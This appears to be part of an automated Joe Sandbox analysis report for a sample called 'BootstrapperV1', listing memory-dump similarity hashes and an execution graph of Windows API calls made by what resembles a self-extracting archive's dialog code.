                                                      • API String ID:
                                                      • Opcode ID: 15ff3e24612f7033981739ed67153c7235060d0a303a757fd4c30723ed814112
                                                      • Instruction ID: f04e8016418b0cdb9c4ecd98742e209ba2391996deb6ea6d5c4c43fe15d2d2b9
                                                      • Opcode Fuzzy Hash: 15ff3e24612f7033981739ed67153c7235060d0a303a757fd4c30723ed814112
                                                      • Instruction Fuzzy Hash: 2401D130919BCD4FCB46DF6888280ED7FB0FF56200B0508EBD468C72A3CA794514C741
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4dc968249a743711e2396845f4d17eaa925119952a80ad4956d5f433bef7a606
                                                      • Instruction ID: 4beb5ca49d08945529a40314ac176fffa44a606a2185a283ff7676f337e86d0c
                                                      • Opcode Fuzzy Hash: 4dc968249a743711e2396845f4d17eaa925119952a80ad4956d5f433bef7a606
                                                      • Instruction Fuzzy Hash: 24F0C83190EA8A0FE3669B6884655E47BE1BF09350B0E01F6D488CB1A3D91CE9858761
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3a5dcb7c12523507d85676c04f30f6965e7fea9975f25be0c1ca3ee73bb67e13
                                                      • Instruction ID: 0f741a87c1b73dfa1d3bb7e25ef567df22e4acdd0a0e796f9ae9a9c3a73d33f5
                                                      • Opcode Fuzzy Hash: 3a5dcb7c12523507d85676c04f30f6965e7fea9975f25be0c1ca3ee73bb67e13
                                                      • Instruction Fuzzy Hash: C3E0E512B19D1E0AEAF8B71C64659F937D2DFD8250B410276D40DC32AADC08AD4243C5
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 96d74727d6aef796621ffa3005c491a9197c95bb3b8a48ee8788d7dd676c66f8
                                                      • Instruction ID: aed904647c945326c1302bc70c7ff7a486bdf747759481ae44ed56445a2f3fb8
                                                      • Opcode Fuzzy Hash: 96d74727d6aef796621ffa3005c491a9197c95bb3b8a48ee8788d7dd676c66f8
                                                      • Instruction Fuzzy Hash: C2F0FC30B2AA1A5EE7705764C4586B57BE1EF40361F06417CC44E831F0DE287982C3C8
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f62c4b9e5b757fb9b1df40d57f91b7f26db1eee040f1c4b99510854a126c048a
                                                      • Instruction ID: 7a4863031085b9ef12ce795698f00e9c91595033b163cd6c8c3a3cdae4a7adc4
                                                      • Opcode Fuzzy Hash: f62c4b9e5b757fb9b1df40d57f91b7f26db1eee040f1c4b99510854a126c048a
                                                      • Instruction Fuzzy Hash: D0F0307071890C4FDBD4EF5CC4A5AA933D2EF5C340B0484B9A88DCB26BDE24EC418790
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c06778668429358255191341b602cd5be470178a72ae4526aa65147fa68bbb75
                                                      • Instruction ID: cddfe3175f89e64f504220e9ffdc9e78722cbc4ac07d6b6ea22dce3d7ede4bf2
                                                      • Opcode Fuzzy Hash: c06778668429358255191341b602cd5be470178a72ae4526aa65147fa68bbb75
                                                      • Instruction Fuzzy Hash: 53F0EC3171AD0D0AD6B4B71C6054AFA26D1DFDD360F06013AF48EC33D5DD196D828380
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 13b122298869b8d81d5a896900d820312155609938994ada172edd102aab805e
                                                      • Instruction ID: 3ecd17c2aea5d4c8a144281d5cdab2f368639aa5ac1f95c5f159649fe80cab4d
                                                      • Opcode Fuzzy Hash: 13b122298869b8d81d5a896900d820312155609938994ada172edd102aab805e
                                                      • Instruction Fuzzy Hash: 8AF0393270C94D8F8F88EF58E451DEAB3A0FBA832071001A6E00AC7156DA31E852CBC0
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9befc48bab00db54a46e1604d342ca47031dd10f1ecf90a35c4c86934b7eb6c2
                                                      • Instruction ID: 4c1b7b29c4703fc0b05dfec635c6da67194dc222a01b3c8fbca8565e5a402793
                                                      • Opcode Fuzzy Hash: 9befc48bab00db54a46e1604d342ca47031dd10f1ecf90a35c4c86934b7eb6c2
                                                      • Instruction Fuzzy Hash: 49E08631F2E81D4FDAB4EB5C5454AB577E1EF0C78170504E6E49EC72E5D5015D0883C1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4d68c01f0991485788b344df86ea4d3f7018eb2af444ad2e0bd1e2226c6e38e9
                                                      • Instruction ID: f5c4f0b00c8c57aacc4ae5e43421187796e17d6e5ab0f55e81e8cc3d2550d8b5
                                                      • Opcode Fuzzy Hash: 4d68c01f0991485788b344df86ea4d3f7018eb2af444ad2e0bd1e2226c6e38e9
                                                      • Instruction Fuzzy Hash: C9E0D831B0850E4FE738D748D4A05F53352EF99361F15467BC84AC66E4DD18E5414340
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8a1c75c644064a509f5ca1f677802aa021618f6bc013385a9d3a3dc67d64598
                                                      • Instruction ID: e7a8c4018f0580a156384131ac0c5a8b393d3f60142c71c56ad7ca5316688b00
                                                      • Opcode Fuzzy Hash: d8a1c75c644064a509f5ca1f677802aa021618f6bc013385a9d3a3dc67d64598
                                                      • Instruction Fuzzy Hash: 7DE02B21F0FD0E07EE9CBA755CB615031D1FFEE254BDA00A9E44CC2192FD8AD9928341
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cca6a045a2016ba5872aaa34ec87e2239bb3894ffdc4b070874e98f81ff5de0d
                                                      • Instruction ID: 508259afd14e4e6ff43b4df64923f85870c6d3b17cf829d69942d500c6edc8eb
                                                      • Opcode Fuzzy Hash: cca6a045a2016ba5872aaa34ec87e2239bb3894ffdc4b070874e98f81ff5de0d
                                                      • Instruction Fuzzy Hash: 3CD05E11F1BE2E1AD4B4736C28352A92C82DF8C620B4A0772E80CC32BDEC489E8142C9
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a6e9609f414b2c6dee6a9b60682e59ddfd1caf386be40e54ae2b86e41f9fbf4b
                                                      • Instruction ID: cce21eee2bb98f696b0eede8534dc700f26e92e67beaba74c8fa27c61f96f7f7
                                                      • Opcode Fuzzy Hash: a6e9609f414b2c6dee6a9b60682e59ddfd1caf386be40e54ae2b86e41f9fbf4b
                                                      • Instruction Fuzzy Hash: 4DE0C220A1AA4A07F714BB724C450BA71D1BF8C285FC54B76D8CCD10A0FA2CC3C84242
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 22203e6378f4f5bc4a1937834fb2dbca02914a6ecd08eb00ea1aeca88438a138
                                                      • Instruction ID: e83020dac23bee372c4a50ad43952cc0a1e984c201cd965bf0e90ac94ef82c35
                                                      • Opcode Fuzzy Hash: 22203e6378f4f5bc4a1937834fb2dbca02914a6ecd08eb00ea1aeca88438a138
                                                      • Instruction Fuzzy Hash: C2D0A701B19D1D0BA2D5AA9C74915F96281DBD81213400677C00AC228ECC1958460341
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 28cfcb10db7feb2279e5b8633e552c7b9afe1379b42a5352a7b385fe40ab022e
                                                      • Instruction ID: e6ab7d3086092b6699877e88b5d1fb9f81b94520a8cc8c984d66a6b7b0048645
                                                      • Opcode Fuzzy Hash: 28cfcb10db7feb2279e5b8633e552c7b9afe1379b42a5352a7b385fe40ab022e
                                                      • Instruction Fuzzy Hash: 2AE0B66154F78A5FCA92BBB885660C97BE15F0A6A071944EAE588DF0E3E55C488E8302
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3e540e96d9286f58e919a74015f00a8b9263bf3238548727e73af104b210a6c5
                                                      • Instruction ID: bb813d3ca483c7233fbce918451b08d5bd5ae2de4937d0992b2e77a2c4b96b94
                                                      • Opcode Fuzzy Hash: 3e540e96d9286f58e919a74015f00a8b9263bf3238548727e73af104b210a6c5
                                                      • Instruction Fuzzy Hash: 2CD02B30B1CD1C09EB60BB6850246F923C0CF48394F050537FC4CD21B0ED485A8102C1
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0628c9a6ccba27a66c3e05b125a7171081aeecfdfdfdc06c4e2b73aea6f90a33
                                                      • Instruction ID: dbf17aee41df13649000d74ac1a3b4548d21daa296b89445f3f24bef9afbff73
                                                      • Opcode Fuzzy Hash: 0628c9a6ccba27a66c3e05b125a7171081aeecfdfdfdc06c4e2b73aea6f90a33
                                                      • Instruction Fuzzy Hash: 00D02B3061E91D0FDAB4DB5D94949603BE0FF0CB0030511DAC48CC7261D844AC814381
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 956b379a9c9eba88aae593d2b292596b9b3d23302e7bd1dbe9a19494cacac553
                                                      • Instruction ID: 0de11dca2d271bfbe8b2f5cc69121f2868f1d171491a86a17de41572879cbad1
                                                      • Opcode Fuzzy Hash: 956b379a9c9eba88aae593d2b292596b9b3d23302e7bd1dbe9a19494cacac553
                                                      • Instruction Fuzzy Hash: 60D0A762A1F84C1AE174A36C0C1C6760886CFCD2D0B5B02B9B46CC31A5EC046D810291
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5d41566ec289db0c9c0e1236429250594f18be49c0d52a3a30b65739f4429f1c
                                                      • Instruction ID: 65f067e5744b81f773dc802c21c1da80f858958e69e00589562066bef4bc49f3
                                                      • Opcode Fuzzy Hash: 5d41566ec289db0c9c0e1236429250594f18be49c0d52a3a30b65739f4429f1c
                                                      • Instruction Fuzzy Hash: ABE08C30B2EA1E46E1709FA540213B97182FF48700F119A34D0AEC26E2DD3D72815790
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2db180de371f70acc9d829c5e8c873bd2cf533cc1e6a63e32f23742b7c91eeca
                                                      • Instruction ID: 01b71e606ef4baee4ae299c9360bef930878c747e887d28a2811cbdaa19d5cd2
                                                      • Opcode Fuzzy Hash: 2db180de371f70acc9d829c5e8c873bd2cf533cc1e6a63e32f23742b7c91eeca
                                                      • Instruction Fuzzy Hash: 07D0237075B54A0FD3016FF808392A47EE0DF4511074404FFC485CB177C85C04864311
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f688d638c1f5b977826098eaa32055b4d9754f7597d539e3631f0a58a46d14e9
                                                      • Instruction ID: 7a9fe5e2d434854e368c55e8fad44301261c1be4a29ed2332f39596f7f00568a
                                                      • Opcode Fuzzy Hash: f688d638c1f5b977826098eaa32055b4d9754f7597d539e3631f0a58a46d14e9
                                                      • Instruction Fuzzy Hash: E8D05E306092444FCB58AE28A090C80B790EF1220835509E8E0144B1E7C52ADC86CB01
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 993b69e6f1810c3b766d4200a47cde8246ab241977de7514772b2c481835660e
                                                      • Instruction ID: a384f39bcefce4e79a879c3b0850d664186ac9c49930f04f195bcb261b1263aa
                                                      • Opcode Fuzzy Hash: 993b69e6f1810c3b766d4200a47cde8246ab241977de7514772b2c481835660e
                                                      • Instruction Fuzzy Hash: A0B09B62E19B4D0BD291DA4C145815116C3D7D8145B05821A54C9C1264DD1555015740
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 43e9e5c663ce5376ce48f46a323b3163d0044c5afe494ba13e5debf6146c2b34
                                                      • Instruction ID: bf6d8328ec215c6404ba6072cba6c8ebc3570ee508f299d5bc18ad36efddb76c
                                                      • Opcode Fuzzy Hash: 43e9e5c663ce5376ce48f46a323b3163d0044c5afe494ba13e5debf6146c2b34
                                                      • Instruction Fuzzy Hash:
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.1955246989.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ffd9b7f0000_BootstrapperV1.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 53e23e80ffdc7a54e3cbbede6c5f9fbe66862b06c681135ee5d99b9d06674da9
                                                      • Instruction ID: 6985cab0b0251216ad0441c62cccbfd354fa707d409cb2dd7cbf74b61fa520c4
                                                      • Opcode Fuzzy Hash: 53e23e80ffdc7a54e3cbbede6c5f9fbe66862b06c681135ee5d99b9d06674da9
                                                      • Instruction Fuzzy Hash: EBC1AD37B087954AC31EFA6CF4A64F8FB60FF80362704467BC1499A0B6CA25619AC7D0

                                                      Execution Graph

                                                      Execution Coverage:9.5%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:5.1%
                                                      Total number of Nodes:1481
                                                      Total number of Limit Nodes:45
                                                      execution_graph 25294 d3f4d3 20 API calls 23399 d3e1d1 14 API calls ___delayLoadHelper2@8 23401 d3e2d7 23402 d3e1db 23401->23402 23404 d3e85d 23402->23404 23430 d3e5bb 23404->23430 23406 d3e86d 23407 d3e8ca 23406->23407 23418 d3e8ee 23406->23418 23408 d3e7fb DloadReleaseSectionWriteAccess 6 API calls 23407->23408 23409 d3e8d5 RaiseException 23408->23409 23410 d3eac3 23409->23410 23410->23402 23411 d3e966 LoadLibraryExA 23412 d3e9c7 23411->23412 23413 d3e979 GetLastError 23411->23413 23417 d3e9d9 23412->23417 23419 d3e9d2 FreeLibrary 23412->23419 23414 d3e9a2 23413->23414 23415 d3e98c 23413->23415 23420 d3e7fb DloadReleaseSectionWriteAccess 6 API calls 23414->23420 23415->23412 23415->23414 23416 d3ea37 GetProcAddress 23421 d3ea47 GetLastError 23416->23421 23426 d3ea95 23416->23426 23417->23416 23417->23426 23418->23411 23418->23412 23418->23417 23418->23426 23419->23417 23423 d3e9ad RaiseException 23420->23423 23424 d3ea5a 23421->23424 23423->23410 23425 d3e7fb DloadReleaseSectionWriteAccess 6 API calls 23424->23425 23424->23426 23427 d3ea7b RaiseException 23425->23427 23439 d3e7fb 23426->23439 23428 d3e5bb ___delayLoadHelper2@8 6 API calls 23427->23428 23429 d3ea92 23428->23429 23429->23426 23431 d3e5c7 23430->23431 23432 d3e5ed 23430->23432 23447 d3e664 23431->23447 23432->23406 23434 d3e5cc 23435 d3e5e8 23434->23435 23450 d3e78d 23434->23450 23455 d3e5ee GetModuleHandleW GetProcAddress GetProcAddress 23435->23455 23438 d3e836 23438->23406 23440 d3e82f 23439->23440 23441 d3e80d 23439->23441 23440->23410 23442 d3e664 DloadReleaseSectionWriteAccess 3 API calls 23441->23442 23443 d3e812 23442->23443 23444 d3e82a 23443->23444 23445 d3e78d DloadProtectSection 3 API calls 23443->23445 23458 d3e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23444->23458 23445->23444 23456 d3e5ee GetModuleHandleW GetProcAddress GetProcAddress 23447->23456 23449 d3e669 23449->23434 23453 d3e7a2 DloadProtectSection 23450->23453 23451 d3e7a8 23451->23435 23452 d3e7dd VirtualProtect 23452->23451 23453->23451 23453->23452 23457 d3e6a3 VirtualQuery GetSystemInfo 23453->23457 23455->23438 23456->23449 23457->23452 23458->23440 25373 d4a3d0 21 API calls 2 library calls 25374 d52bd0 VariantClear 23460 d210d5 23465 d25abd 23460->23465 23466 d25ac7 __EH_prolog 23465->23466 23472 d2b505 23466->23472 23468 d25ad3 23478 d25cac GetCurrentProcess GetProcessAffinityMask 23468->23478 23473 d2b50f __EH_prolog 23472->23473 23479 d2f1d0 82 API calls 23473->23479 23475 d2b521 23480 d2b61e 23475->23480 23479->23475 23481 d2b630 __cftof 23480->23481 23484 d310dc 23481->23484 23487 d3109e GetCurrentProcess GetProcessAffinityMask 23484->23487 23488 d2b597 23487->23488 23488->23468 25358 d40ada 51 API calls 2 library calls 23681 d3dec2 23682 d3decf 23681->23682 23689 d2e617 23682->23689 23685 d24092 _swprintf 51 API calls 23686 d3def1 SetDlgItemTextW 23685->23686 23693 d3b568 PeekMessageW 23686->23693 23690 d2e627 23689->23690 23698 d2e648 23690->23698 23694 d3b583 GetMessageW 23693->23694 23695 d3b5bc 23693->23695 23696 d3b599 IsDialogMessageW 23694->23696 23697 d3b5a8 TranslateMessage DispatchMessageW 23694->23697 23696->23695 23696->23697 23697->23695 23704 d2d9b0 23698->23704 23701 d2e645 23701->23685 23702 d2e66b LoadStringW 23702->23701 23703 d2e682 LoadStringW 23702->23703 23703->23701 23709 d2d8ec 23704->23709 23706 d2d9cd 23707 d2d9e2 23706->23707 23717 d2d9f0 26 API calls 23706->23717 23707->23701 23707->23702 23710 d2d904 23709->23710 23716 d2d984 _strncpy 23709->23716 23712 d2d928 23710->23712 23718 d31da7 WideCharToMultiByte 23710->23718 23715 d2d959 23712->23715 23719 d2e5b1 50 API calls __vsnprintf 23712->23719 23720 d46159 26 API calls 3 library calls 23715->23720 23716->23706 23717->23707 23718->23712 23719->23715 23720->23716 25332 d3b5c0 100 API calls 25375 d377c0 118 API calls 25376 d3ffc0 RaiseException _com_raise_error _com_error::_com_error 25359 d362ca 123 API calls __InternalCxxFrameHandler 25333 d295f0 80 API calls 25334 d3fd4f 9 API calls 2 library calls 25361 d25ef0 82 API calls 23730 d498f0 23738 d4adaf 23730->23738 23734 d4990c 23735 d49919 23734->23735 23746 d49920 11 API calls 23734->23746 23737 d49904 23747 d4ac98 23738->23747 23741 d4adee TlsAlloc 23742 d4addf 23741->23742 23743 d3fbbc CatchGuardHandler 5 API calls 23742->23743 23744 d498fa 23743->23744 23744->23737 23745 d49869 20 API calls 2 library calls 23744->23745 23745->23734 23746->23737 23748 d4acc8 23747->23748 23751 d4acc4 23747->23751 23748->23741 23748->23742 23749 d4ace8 23749->23748 23752 d4acf4 GetProcAddress 23749->23752 23751->23748 23751->23749 23754 d4ad34 23751->23754 23753 d4ad04 _abort 23752->23753 23753->23748 23755 d4ad55 LoadLibraryExW 23754->23755 23760 d4ad4a 23754->23760 23756 d4ad72 GetLastError 23755->23756 23757 d4ad8a 23755->23757 23756->23757 23758 d4ad7d LoadLibraryExW 23756->23758 23759 d4ada1 FreeLibrary 23757->23759 23757->23760 23758->23757 23759->23760 23760->23751 23761 d4abf0 23764 d4abfb 23761->23764 23763 d4ac24 23774 d4ac50 DeleteCriticalSection 23763->23774 23764->23763 23765 d4ac20 23764->23765 23767 d4af0a 23764->23767 23768 d4ac98 _abort 5 API calls 23767->23768 23769 d4af31 23768->23769 23770 d4af4f InitializeCriticalSectionAndSpinCount 23769->23770 23773 d4af3a 23769->23773 23770->23773 23771 d3fbbc CatchGuardHandler 5 API calls 23772 d4af66 23771->23772 23772->23764 23773->23771 23774->23765 25296 d488f0 7 API calls ___scrt_uninitialize_crt 25298 d42cfb 38 API calls 4 library calls 23812 d3b7e0 23813 d3b7ea __EH_prolog 23812->23813 23980 d21316 23813->23980 23816 d3b841 23817 d3b82a 23817->23816 23820 d3b89b 23817->23820 23821 d3b838 23817->23821 23818 d3bf0f 24052 d3d69e 23818->24052 23823 d3b92e GetDlgItemTextW 23820->23823 23829 d3b8b1 23820->23829 23824 d3b878 23821->23824 23825 d3b83c 23821->23825 23823->23824 23828 d3b96b 23823->23828 23824->23816 23832 d3b95f KiUserCallbackDispatcher 23824->23832 23825->23816 23835 d2e617 53 API calls 23825->23835 23826 d3bf2a SendMessageW 23827 d3bf38 23826->23827 23830 d3bf52 GetDlgItem SendMessageW 23827->23830 23831 d3bf41 SendDlgItemMessageW 23827->23831 23833 d3b980 GetDlgItem 23828->23833 23978 d3b974 23828->23978 23834 d2e617 53 API calls 23829->23834 24070 d3a64d GetCurrentDirectoryW 23830->24070 23831->23830 23832->23816 23838 d3b9b7 SetFocus 23833->23838 23839 d3b994 SendMessageW SendMessageW 23833->23839 23840 d3b8ce SetDlgItemTextW 23834->23840 23841 d3b85b 23835->23841 23837 d3bf82 GetDlgItem 23842 d3bfa5 SetWindowTextW 23837->23842 23843 d3bf9f 23837->23843 23844 d3b9c7 23838->23844 23855 d3b9e0 23838->23855 23839->23838 23845 d3b8d9 23840->23845 24092 d2124f SHGetMalloc 23841->24092 24071 d3abab GetClassNameW 23842->24071 23843->23842 23849 d2e617 53 API calls 23844->23849 23845->23816 23853 d3b8e6 GetMessageW 23845->23853 23847 d3be55 23851 d2e617 53 API calls 23847->23851 23854 d3b9d1 23849->23854 23850 d3b862 23850->23816 23856 d3c1fc SetDlgItemTextW 23850->23856 23857 d3be65 SetDlgItemTextW 23851->23857 23853->23816 23859 d3b8fd IsDialogMessageW 23853->23859 24093 d3d4d4 23854->24093 23862 d2e617 53 API calls 23855->23862 23856->23816 23863 d3be79 23857->23863 23859->23845 23861 d3b90c TranslateMessage DispatchMessageW 23859->23861 23861->23845 23865 d3ba17 23862->23865 23866 d2e617 53 API calls 23863->23866 23868 d24092 _swprintf 51 API calls 23865->23868 23902 d3be9c _wcslen 23866->23902 23867 d3bff0 23871 d3c020 23867->23871 23874 d2e617 53 API calls 23867->23874 23873 d3ba29 23868->23873 23869 d3c73f 97 API calls 23869->23867 23870 d3b9d9 23990 d2a0b1 23870->23990 23876 d3c73f 97 API calls 23871->23876 23931 d3c0d8 23871->23931 23878 d3d4d4 16 API calls 23873->23878 23879 d3c003 SetDlgItemTextW 23874->23879 23883 d3c03b 23876->23883 23877 d3c18b 23884 d3c194 EnableWindow 23877->23884 23885 d3c19d 23877->23885 23878->23870 23887 d2e617 53 API calls 23879->23887 23880 d3ba73 23996 d3ac04 SetCurrentDirectoryW 23880->23996 23881 d3ba68 GetLastError 23881->23880 23895 d3c04d 23883->23895 23922 d3c072 23883->23922 23884->23885 23891 d3c1ba 23885->23891 24111 d212d3 GetDlgItem EnableWindow 23885->24111 23886 d3beed 23890 d2e617 53 API calls 23886->23890 23888 d3c017 SetDlgItemTextW 23887->23888 23888->23871 23889 d3ba87 23893 d3ba9e 23889->23893 23894 d3ba90 GetLastError 23889->23894 23890->23816 23892 d3c1e1 23891->23892 23907 d3c1d9 SendMessageW 23891->23907 23892->23816 23908 d2e617 53 API calls 23892->23908 23899 d3bb11 23893->23899 23903 d3bb20 23893->23903 23909 d3baae GetTickCount 23893->23909 23894->23893 24109 d39ed5 32 API calls 23895->24109 23896 d3c0cb 23898 d3c73f 97 API calls 23896->23898 23898->23931 23899->23903 23904 d3bd56 23899->23904 23901 d3c1b0 24112 d212d3 GetDlgItem EnableWindow 23901->24112 23902->23886 23910 d2e617 53 API calls 23902->23910 23912 d3bcfb 23903->23912 23914 d3bcf1 23903->23914 23915 d3bb39 GetModuleFileNameW 23903->23915 24012 d212f1 GetDlgItem ShowWindow 23904->24012 23905 d3c066 23905->23922 